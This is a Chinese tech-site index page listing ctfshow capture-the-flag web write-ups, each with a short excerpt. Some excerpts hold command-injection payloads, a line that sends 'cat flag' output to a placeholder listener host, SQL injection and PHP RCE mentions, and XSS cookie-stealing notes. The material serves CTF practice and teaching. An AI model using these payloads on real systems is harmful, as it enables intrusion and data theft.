E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
ctfshow
[
CTFSHOW
]
CTFSHOW
击剑杯 部分WP
进群得码群里发送击剑杯签到即可所以就发送“击剑杯签到即可”然后得到flag给我看看三血name='
ctfshow
第一深情';$this->your_answer='Onlyyouknow';$this-
Sapphire037
·
2021-11-13 18:12
CTF
安全
CTF训练之路2--
ctfshow
内部赛
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余(需要再次学习)签退参考资料签到一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。所谓二次注入,就是再register中构造sql语句,然后登录login来触发。找到羽师傅的脚本importrequestsimportreurl_register="http://7b093e85-
Z3eyOnd
·
2021-11-07 22:43
CTF训练日记
安全
web安全
ctfshow
web入门反序列化
文章目录魔术变量web254web255web256web257web258web259web260web261web262web263web264web265web266web267web268~270web271web272~273web274web275web276web277~278魔术变量:__sleep()//在对象被序列化之前运行__wakeup()//将在反序列化之后立即调用(当反
qq_53063436
·
2021-11-06 16:42
php
CTF训练日记1--
ctfshow
萌赛
文章目录签到题给她web_假赛生萌新记忆签到题这个题,比较简单,直接使用分号,执行多个命令来绕过payload:1;ls;1可以再次回顾一下,||,&&,&,|,;的作用Linux的特殊符号想法2:其实这个题,看到curl,我想到了用反弹shell?url=xxxx:10000?p=$(ls);1?url=xxxx:10000?p=$(catflag);1nc-lvvp10000但是监听端口后,出
Z3eyOnd
·
2021-11-03 12:07
CTF训练日记
安全
web安全
python
php特性<2>--
ctfshow
文章目录1.sha1的绕过web104,1062.php变量覆盖web1053.parse_str的绕过web1074.ereg%00正则截断web1085.php异常类web1096.FilesystemIterator类的使用web1107.GLOBALS超全局变量web1118.php伪协议WEB1129./proc/self/root绕过web11310.php伪协议--filterweb
Z3eyOnd
·
2021-11-01 20:33
CTF训练日记
php
开发语言
后端
CTFSHOW
内部赛web writeup
CTFSHOW
内部赛webwriteup太菜了不会写,按着羽师傅和bmth666师傅的writeup复现签到打开界面如上,右键源码可以看到有一个register.php注册界面,需要利用login和register
AshMOB
·
2021-10-29 22:06
ctf比赛wp
web
安全
CTFSHOW
web入门 命令执行+文件包含+PHP特性
刷题时间记录表ID开始时间结束时间刷题范围12021.08.2319:202021.08.2321.30web41-4522021.08.2422:162021.08.250:04web46-5432021.08.2517:06(上班划水)2021.08.2518:00web55-web5842021.08.2520:262021.08.2522:39web59-web7252021.08.262
JJT_with_hair
·
2021-10-26 10:37
web安全
SSRF-
CTFshow
:CTFshowweb351web352web353web354web355web356web357web358web359web360参考文献前言:关于互联网协议的一些认识:互联网协议1互联网协议2
CTFshow
Z3eyOnd
·
2021-10-20 17:50
CTF训练日记
SSRF
web安全
CTFshow
—web入门——命令执行
web入门——命令执行命令执行web29web30web31web32web33web34web35web36web37web38web39web40web41web42web43web44web45web46web47web48web49web50web51web52web53web54web55解法一解法二解法三web56web57web58web59web60web61web62web63w
一aue
·
2021-10-07 19:19
笔记
php
linux
vim
CTFSHOW
sql注入(一)
title:
CTFSHOW
-sql注入(一)data:2021-09-15tags:CTF-webCTFSHOWsql注入(一)开始一周的高强度sql注入训练,先从
ctfshow
的基础开始。
k1he
·
2021-10-04 17:05
sql
php
python
CTFshow
刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞提示:似曾相识,就这一个文件,不用扫描注释中只有一个用burp抓包发现响应行中的X-Powered-By字段很可疑谷歌之后发现该PHP版本存在漏洞:PHP远程代码执行漏洞(CVE-2019-11043漏洞原理CVE-2019-11043是一个远程代码执行漏洞,使用某些特定配置的Nginx+PHP-FPM的服务器存在漏洞,可允
Ocean:)
·
2021-10-03 15:12
#
CTF
#
WEB漏洞
#
漏洞复现
php
nginx
运维
ctf
web安全
CTFshow
刷题日记-WEB-代码审计(web301-310)SQL注入、SSRF打MySQL、SSRF打FastCGI、SSRF文件读取
web301-SQL注入下载源码,在checklogin.php页面存在SQL注入$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";$username=$_POST['userid'];$user
Ocean:)
·
2021-10-03 10:23
#
CTF
#
WEB漏洞
#
代码审计
php
mysql
sql
ctf
代码审计
CTFshow
刷题日记-WEB-XSS(web316-333)
web316-无过滤反射型XSS大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接方法一:xss平台利用xss平台生成链接xss平台https://xsshs.cn/,https://xss.pt/,http://xsscom.com在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中刷新下页面,然后在平台查看项目方法二:自动接收脚
Ocean:)
·
2021-09-29 19:02
#
CTF
#
WEB漏洞
php
javascript
ctf
xss
xsrf
CTFshow
月饼杯(第二届) 中秋快乐 部分wp
苟,都可以苟只要我osint做的够快我就不会被刷掉.jpg体验很好,下次还来(注:tao2更新目录1、webweb签到2、crypto我的木头啊!!!一封信3、miscprojectTao-1projectTao-2有手就行杂项签到HelloFlag3、osintPS打卡第一天见字如面我的朋友抬头看看套套去哪儿幸福小镇以卵击石1、webweb签到直接贴脚本吧,web不太懂不解释
FW_Suica
·
2021-09-21 11:05
笔记
ctf
安全
[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[
ctfshow
]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
XML基础XML文件可以分为三部分:XML声明DTD文档定义类型。文档元素根元素foo,子元素note,属性categoryXML语法XML被设计为传输和存储数据基本语法:-所有XML元素都须有关闭标签。-XML标签对大小写敏感。-XML必须正确地嵌套。-XML文档必须有根元素。-XML的属性值须加引号。预定义的实体引用>大于&&和号’’单引号""引号注释DTD文档类型定义DTD可定义合法的XML
shu天
·
2021-08-23 11:14
#
web
ctf
xml
web
ctf
DTD
ctfshow
web入门 命令执行前篇(web29-web54)
目录web29web30web31web32web33web34-web36web37web38web39web40web41web42web43web44web45web46web47web48web49web50web51web52web53web54web29重定向符6.%09所以这个题的payload?c=echo(`more%09f*`);再附上大佬们的payload?c=eval($_
parkour-
·
2021-08-18 22:39
安全
ctfshow
-SQL注入篇[Web214-Web233]
参考:https://blog.csdn.net/solitudi/article/details/110144623Web214在首页的select.js中可以看到:向/api/提交了两个参数:ip和debug。经过手动测试,参数ip可以进行sql注入,如下会有延迟:基于此可以写出s基于时间盲注的脚本:importrequestsurl="http://38d705ce-9c40-4fb0-a9
一碗海鲜汤
·
2021-08-08 17:42
ctf-web刷题-
ctfshow
-爆破-web23
看一下代码接收get参数token,然后把接收到的值进行md5加密,再判断第2位和第15位是否完全相等并且第十五位和第十八位也完全相等完全前面的要求之后还要判断第二位第十五位第十八位取int值后进行相加是否等于第32位这里的话给出的解题方案就是通过脚本1-9a-z组合生成md5然后进行判断是否符合条件#coding:utf-8#啊韬importhashlibdic='0123456789qazws
None安全团队
·
2021-08-01 15:55
ctf
[web安全学习]
ctfshow
-php特性总结
文章目录一.常见php函数1.intval2.strpos3.is_numeric4.var_dump()5.call_user_func()函数5.parse_str6.strrev7.get_defined_vars二.常见绕过方法尝试添加加号+和空格进行绕过进制绕过采用伪协议绕过如:数组绕过三目运算符+变量覆盖PHP弱类型比较and与&&的区别+反射类ReflectionClass的使用绕过
Y1seco
·
2021-07-30 23:19
安全学习
web安全
命令注入
ctfshow
title:
CTFshow
命令注入date:2021-07-15tags:[ctf]description:刷题记录搜索引擎http://helosec.com/正则解释https://regexper.com
_Stary
·
2021-07-20 21:36
笔记
CTF
php
[网鼎杯2018]Unfinish&&
CTFSHOW
内部赛签到题
CTFSHOW
那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下然后扫目录的时候有源码泄露www.zip,下载后读下代码user.php10
Je3Z
·
2021-07-15 23:31
ctf
web
CTFSHOW
funny&unusualrsa系列
CTFSHOWfunny&unusualrsa系列funnyrsa1funnyrsa2funnyrsa3unusualrsa1unusualrsa2unusualrsa3unusuarsa4unusualrsa5De1CTF2019-BabyRSA0ctf2016-RSA?抱我妈呀,完了这两个系列有针对RSA密码中,gcd(e,φ)≠1gcd(e,\varphi)\neq1gcd(e,φ)=1的
4XWi11
·
2021-07-09 12:10
树哥让我天天写之Crypto
ctfshow
WEB AK赛
WEBAK赛签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload签到_观己考点文件包含思路盲猜一波flag在根目录下,所以直接读取试试Payload源码web1_观字考点正则表达式绕过,ssrf思路观察源码,发现其过滤了很多关键词,源码提示我们flag的位置但是.被过滤了,想
H3rmesk1t
·
2021-06-14 17:07
ctfshow-web
php
ctf
web安全
ctfshow
新星计划
CTFshow
——中期测评
前言一个网站给群主大大搞了那么多题,。不过做到后面根本做不动,我太菜了,爬了爬了,等晚一点再爬回来看看师傅们怎么解的。文章目录前言486——目录穿越487——SQL488——489——490——491——492——493——494、495——496——bool盲注497——SSRF498——SSRF、redis499——500——501——502——503——文件上传+Phar反序列化504——(
D.MIND
·
2021-05-23 00:43
做题杂记~
[
ctfshow
]大牛杯
web_checkin');for($i=1;$i接下来就是往某个目录下的php文件里面写东西了file_put_contents("$dir"."index.php","<?=`nl%09/*`成功获取flagMudupx脱壳后,拉到ida,找到游戏结束那一块flag在这里
huamanggg
·
2021-05-16 15:45
比赛wp
Ctfshow
五月赛 大牛杯 Web&BlockChain
web_checkinban了这些:acegikmoqsuwy13579\+_\(&-#@~\[{\"\.,:直接拿短标签和nl,反引号打:?>settings=array('display_errors'=>'On','allow_url_fopen'=>'On');$this->params=array();}publicfunction__wakeup(){foreach($this->se
bfengj
·
2021-05-03 23:16
比赛WP
writeup
ctfshow
大牛杯web
文章目录web_checkineasy_unserializeeasy_cmsRealWorld_CyberShowweb_checkin。。。。。。我傻了数错字符了。。。。。直接?code=?>b`开始竞争importrequestsimportthreadingimportsyssession=requests.session()url1="http://ba2bd9c4-6f58-45a1-
yu22x
·
2021-05-03 20:41
CTFSHOW
---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----
00000+一、自己做:三、看WP:web3_观图一、自己做:三、学习WP:web4_观心一、自己做:这个应该是可以的,只不过这里不对,调用外部文件执行RCEweb0_签到_观己一、自己做:吐槽一句,
ctfshow
Zero_Adam
·
2021-04-29 22:32
sql注入
python脚本练习
php
web
CTFSHOW
web入门 文件包含篇
文章目录web78web79web80web81web82-86web87web88web116web117web78filter伪协议payloadfile=php://filter/convert.base64-encode/resource=flag.php解码后得到flagweb79data伪协议payloadfile=data://text/plain,web80远程文件包含xxx为自己
yu22x
·
2021-04-28 09:07
CTFSHOW
:36D杯的 ALL_INFO_U_WANT ---文件上传-phpinfo包含-日志包含-临时文件包含-Linux查找文件内容命令
目录:一、自己做:二、学到的:三、学习WP1.预期解1----包含日志文件2.预期解2---包含临时文件,linux命令考察:参考自:https://www.gem-love.com/ctf/2283.html参考:https://www.gem-love.com/ctf/2283.html一、自己做:到时候,自己再开环境再做一遍。先看了WP。。弄到了提示:phpinfo()看了,diabled_
Zero_Adam
·
2021-04-27 19:44
php
shell
CTFShow
文件上传WP(持续更新)
这里记录一下我的
ctfshow
文件上传练习的过关总结,因为是小白,所以对一些知识点的理解也许不对,希望有什么不对的地方,大家可以交流一下。会持续更新的哦!
harperRen
·
2021-04-27 13:28
小白
ctfshow文件上传过关
web
[
CTFSHOW
]反序列化
web257class=newinfo();}publicfunctionlogin($u,$p){return$this->username===$u&&$this->password===$p;}publicfunction__destruct(){$this->class->getInfo();}}classinfo{private$user='xxxxxx';publicfunctiong
huamanggg
·
2021-04-27 02:37
刷题记录
Ctfshow
web入门 thinkphp专题(持续更新)
web569看一下thinkphp3.2.3官方手册,看完就都懂了:ThinkPHP3.2.3完全开发手册首先就是路由的方式:http://serverName/index.php/模块/控制器/操作此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE'=>true,这个配置决定。URL模式的话,默认是PATHINFO模式,即本题考察的模式。直接访问即可:/index.php
bfengj
·
2021-04-25 16:26
CMS和框架
thinkphp
ctfshow
文件上传
web151(前端限制)这里需要上传图片木马!所以我们需要先制作一张图片木马!php的一句话木马:asp的一句话是:aspx的一句话是:这里是比较常用的一句话木马!copy1.png/b+2.php/a3.png然后上传抓包!然后就有点搞笑了!上面是错误示范!这样子就可以了!web152(后端限制)这里与上一题是一样的方法!一模一样!分毫不差!web153(.user.ini配置文件绕过)上传ph
四代机您发多少
·
2021-04-23 19:00
快乐学校web
ctfshow
-phpCVE
前言首先要安装go语言!这个需要配置好,有点难配置!此时我们下载phuip-fpizdam这个工具!web311这里就要用到了phuip-fpizdam这个工具了!然后再用index.php?a的命令去执行!web312(CVE-2018-19518)PHP的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函
四代机您发多少
·
2021-04-20 18:37
快乐学校web
ctfshow
-SSRF
SSRF其全称:Server—SideRequestForgery:服务器端请求伪造是一种由攻击者构造形成的由服务器端发起请求的一个安全漏洞。一般情况下,攻击的目是外网没有办法访问的内网。很多WEb应用都其提供了从其他服务器上获取数据的功能,使用指定的url,web应用可以获取图片,下载文件,读取文件等。这个功能如果被恶意使用,可以利用存在缺陷的web引用做为代理,攻击远程和本地服务器。web35
四代机您发多少
·
2021-04-19 22:52
快乐学校web
ctfshow
反序列化
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码shellcode(可提权代码)对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情exp(Exploit)漏洞利用,一般是个demo程序poc(ProofofConcept)漏洞证明
四代机您发多少
·
2021-04-18 15:13
快乐学校web
ctfshow
命令执行
web29error_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag/i",$c)){eval($c);}}else{highlight_file(__FILE__);}过滤了flag(无论大小写)然后开始构造urlhttp://d21fb9a4-ae00-4ab5-89a5-21dbe59eaa19.c
四代机您发多少
·
2021-04-14 22:08
快乐学校web
ctfshow
文件包含
web78if(isset($_GET['file'])){$file=$_GET['file'];include($file);}else{highlight_file(__FILE__);}要用php伪协议php://filter来构造payload!!!首先这是一个file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=co
四代机您发多少
·
2021-04-11 23:35
快乐学校web
ctfshow
渔人杯2021 部分WP
图片较多,手机加载较慢python写的及其拉胯,所以请见谅(是真的拉胯)解题用的方法都是笨方法,大家知道怎么做了之后可以找简单的方法已解题:签到抽奖、神仙姐姐、飘啊飘、感受下气氛、我跟你拼了、套神应援团.png、贪吃蛇的秘密、简单二维码、misc41、亚当和夏娃加上自己的两道题:你以为是easyRSA吗,其实是我套娃之神哒、我想要获得旗帜后面补充的题(在很后面)阿拉丁、迷、LunaticRE1.签
是Mumuzi
·
2021-04-01 20:10
ctf
ctfshow
python
信息安全
CTFSHOW
中期测评486-509(持续更新中)
web486扫描后台发现flag.php,根据url发现存在文件包含,templates/xxx.php所以只需要action=…/flag即可payload:index.php?action=../flagweb487通过action=…/index得到sql语句$sql="selectidfromuserwhereusername=md5('$username')andpassword=md5
yu22x
·
2021-03-30 21:56
CTFSHOW
文件包含
今天复习一下文件包含漏洞文章目录web78web79web80-81web82夹带私活[NPUCTF2020]ezincludeweb78payload:?file=php://filter/convert.base64-encode/resource=flag.phpweb79payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjY
海上清辉
·
2021-03-27 16:04
CTFSHOW
php
安全
web
CTFSHOW
WEB入门 命令执行做题笔记(持续更新)
校队考核被打自闭了回炉重造文章目录29-362930313233-3637-443738394029-3629&1=system('catflag.php');c=?>访问页面会显示aaaaaaa&1=system('catflag.php');eval($_GET[1]);&1=system('catflag.php');Tips:1.与前面的题目相比,考点在于空格的过滤2.绕过方法%09${I
海上清辉
·
2021-03-27 11:43
CTFSHOW
安全
ctfshow
web入门 文件上传(持续更新)
文章目录web151-152web153web154-159web160web161web151-152hint是前台验证,那么直接先上传.png后缀的图片马,在burp中将.png改为.php即可,然后蚁剑连接拿到flagweb153这题我试了把后缀改为.Php.php2.phtml估计是服务器不解析的原因,在访问时只能把他们下载下来,因为这里是nginx,所以试了上传.user.ini,发现可
⎝shyshy⎠
·
2021-03-26 20:24
CTF
php
NODEJS 简单的三个漏洞
NODEJS1.toUpperCase:toUpperCase这个函数有个特点:字符ı、ſ经过toUpperCase()处理后结果为I、S字符K经过toLowerCase()处理后结果为k利用特点(例题1):
CTFSHOW
E1even__
·
2021-03-15 12:03
web基础漏洞知识
安全漏洞
nodejs
json
CTFSHOW
—反序列化
web254?username=xxxxxx&password=xxxxxxweb255GET/?username=xxxxxx&password=xxxxxxHTTP/1.1Host:d66c6632-05e8-4703-9bac-14213020568d.challenge.ctf.show:8080User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;
wa1ki0g~
·
2021-03-11 03:07
ctfshow
-web入门 文件上传篇部分题解
ctfshow
文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160
z.volcano
·
2021-03-06 16:48
#
ctfshow
[
CTFSHOW
]命令执行55-74
web55if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\|\Document给c传值的payload:?c=.%20/???/????????[@-[]成功执行了ls命令接下来就是catflag了这题学到很多知识点,是个好题web57还是过滤了数字和字母,不仅如此,还过滤了|\.|
huamanggg
·
2021-03-05 01:18
刷题记录
CTFSHOW
文件上传
开启文件上传先补充一些知识1.一句话木马只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。2.中国蚁剑的使用此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。web152解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。知识点:①一句话木马的制作:我们使用
Zard丶
·
2021-02-27 17:43
学习思路
ctfshow
F5杯 部分WP(writeup) 超详细
本文共4370字,147段落,全文看完预计用时10分钟这次F5杯的misc难度感觉比大吉杯难了许多,出题人的脑洞太大了在这里感谢各位大师傅群里的随缘hint(水群大胜利)写的非常详细,可以跟着实际操作,所以最后不会贴上静态flagwebeazy-unserialize&eazy-unserialize-revengemisc大小二维码填字游戏牛年大吉3.0两行代码一纸情书F5也会LSBF5还会学中
是Mumuzi
·
2021-02-24 11:59
ctf
ctfshow
信息安全
上一页
9
10
11
12
13
14
15
16
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他